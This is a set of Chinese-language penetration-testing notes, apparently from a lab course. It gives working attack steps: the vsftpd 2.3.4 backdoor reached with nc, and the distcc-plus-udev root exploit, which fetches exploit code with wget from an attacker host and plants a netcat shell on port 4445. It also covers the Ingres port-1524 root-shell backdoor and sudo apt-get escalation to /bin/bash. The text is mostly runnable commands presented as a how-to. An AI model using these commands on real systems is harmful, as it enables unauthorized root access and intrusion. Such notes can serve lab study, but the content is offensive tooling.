DLL劫持
DLL动态链接库
DLL劫持指的是,病毒通过一些手段来劫持或者替换正常的DLL,欺骗正常程序加载预先准备好的恶意DLL。
监控工具: Monitorprocess、火绒剑…
.\dll注入检测脚本.ps1 xxxx.exe
armitage
armitage: 图形化的MSF,完全依赖MSF. 火了之后开发了商业版: cobalt strike –> 这款工具跟msf, empire称为内网三剑客.
armitage安装: apt-get install armitage
运行: armitage
console: 控制台
attacks: 探测目标主机是否有漏洞存在
1. find attacks 快速探测
2. hail mary 全部漏洞探测漏洞复现
netdiscover: 探测内网主机存活
80: http
永恒之蓝: ms17-010 exp: search ms17-010
漏洞发现 –> 验证 –> 公布 –> poc –> exp
vsftpd 2.3.4:
手工利用:
ftp IP
– Connected to 192.168.37.195. – 220 (vsFTPd 2.3.4) – Name (192.168.37.195:root): root:) – password: root
§ 如果有卡住不显示任何东西
§ nc IP 6200 连入
msf: search vsftpd
distcc + udev提权
distcc exp:search distcc
cd /tmp
wget http://192.168.1.135/8572.c -O udev.c
gcc udev.c -o udev
cat /proc/net/netlink
echo ‘#!/bin/bash’ > run
echo ‘/bin/netcat -lvvp 4445 -e /bin/bash’ >> run
./udev 2792
查看端口开放情况: lsof -i:4445
开放了就可以连接了
Ingres数据库DBMS后门
namp扫描: 开放了1524端口,尝试用telnet ip 1524 连接,如果存在后门,直接获取root权限的shell
sudo -l : 查看用户权限,如果有特殊指令存在以root权限运行的话或者不需要密码的话可以拿来提权
apt-get 提权:
前提: 可以不需要密码,或者默认以root权限运行
1.sudo apt-get update -o APT::UPDATE::Pre-invoke::=”/bin/bash -i”
2.sudo apt-get changelog apt –> !/bin/bash